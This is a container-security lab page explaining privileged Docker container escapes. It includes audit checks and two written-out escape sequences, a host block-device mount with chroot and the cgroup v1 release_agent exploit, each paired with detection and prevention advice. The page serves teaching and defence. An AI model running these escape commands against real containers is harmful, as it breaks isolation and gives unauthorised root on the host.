⚠️ Pracivo Security Lab — Docker escape, Kubernetes misconfig, CI/CD secret exposure, supply chain attacks.
Privileged Container Escape
CONTAINER ESCAPE
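# --privileged gives the container ALL Linux capabilities, disables the
# default seccomp/AppArmor confinement and exposes the host's devices —
# root in the container is effectively root on the host.
# Audit check: is this container running privileged?
grep CapEff /proc/self/status
# CapEff = 0000003fffffffff means every capability bit is set on kernels whose
# highest capability number is 37. Newer kernels define more capabilities
# (CAP_PERFMON, CAP_BPF, CAP_CHECKPOINT_RESTORE), so the "everything" mask is
# wider there (000001ffffffffff). Read /proc/sys/kernel/cap_last_cap for the
# kernel's highest capability number, or decode a mask with
# `capsh --decode=<mask>`, instead of matching one constant.
# Or:
# Creating a network interface succeeds with CAP_NET_ADMIN alone, so a
# "Privileged" result here proves only that one capability, not a full
# --privileged container. Treat it as a hint and confirm with CapEff.
if ip link add dummy0 type dummy 2>/dev/null; then
  echo "Privileged"
  # Remove the probe interface: if it is left behind, the next run fails with
  # "File exists" and wrongly reports "Not privileged".
  ip link delete dummy0 2>/dev/null
else
  echo "Not privileged"
fi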
# Method 1: Mount host filesystem via disk device
# Why it works: --privileged exposes the host's block devices under the
# container's /dev and leaves CAP_SYS_ADMIN in place, so mount(2) is permitted.
# Without --privileged the device node is normally absent and the mount is
# refused, so the sequence stops at the mount step.
# Detection: a mount(2) call made by a containerised process, or a container
# process opening a raw host block device, is rare in normal workloads and is
# a good alert condition for auditd or an eBPF runtime sensor.
fdisk -l # find host disk e.g. /dev/sda1
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host # root shell on host
# Method 2: cgroup release_agent exploit (classic privesc)
# Preconditions: CAP_SYS_ADMIN (to mount a cgroup hierarchy) and a cgroup v1
# controller that can be mounted from the container — here rdma. The
# release_agent file is a cgroup v1 feature; cgroup v2 has no equivalent, so a
# host running only the unified hierarchy is not exposed to this path. The
# default seccomp and AppArmor profiles also block the mount, which is why
# the technique depends on --privileged (or an equally loose configuration).
# Detection: watch for a cgroup filesystem mounted from inside a container and
# for any write to a release_agent or notify_on_release file by a container
# process.
#
# Mount the rdma cgroup v1 hierarchy at a path the container can write to.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
# Create a child cgroup and ask the kernel to run the release agent when the
# child becomes empty.
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
# Capture the value that follows "perdir=" in /etc/mtab, i.e. the tail of the
# overlayfs "upperdir=" mount option. Presumably this is the host-side path of
# the container's writable layer — confirm for the storage driver in use.
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
# Register the release agent using the host-side path of /cmd, because the
# kernel resolves this path on the host, not inside the container.
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Payload used by the lab: record the output of `id` in a file that is visible
# inside the container as /output.
echo "#!/bin/sh" > /cmd
echo "id > $host_path/output" >> /cmd
chmod a+x /cmd
# Start a short-lived shell that writes its own PID into the child cgroup and
# exits; the cgroup is then empty and the kernel invokes the release agent.
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output
# Shows root — the release agent ran on the host, outside the container's
# namespaces, so this is host code execution.
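# Prevention:
# Never use --privileged in production; if a workload needs extra rights, start from --cap-drop=ALL and add back individual capabilities with --cap-add
# Use seccomp profiles — keep at least the runtime's default profile enabled; both methods above depend on the mount syscall being allowed
# Use AppArmor/SELinux — keep the default container profile in enforcing mode
# Use rootless Docker, so that root inside the container does not map to root on the host
# In Kubernetes, reject pods that set securityContext.privileged: true (the Pod Security Standards "baseline" level already forbids it)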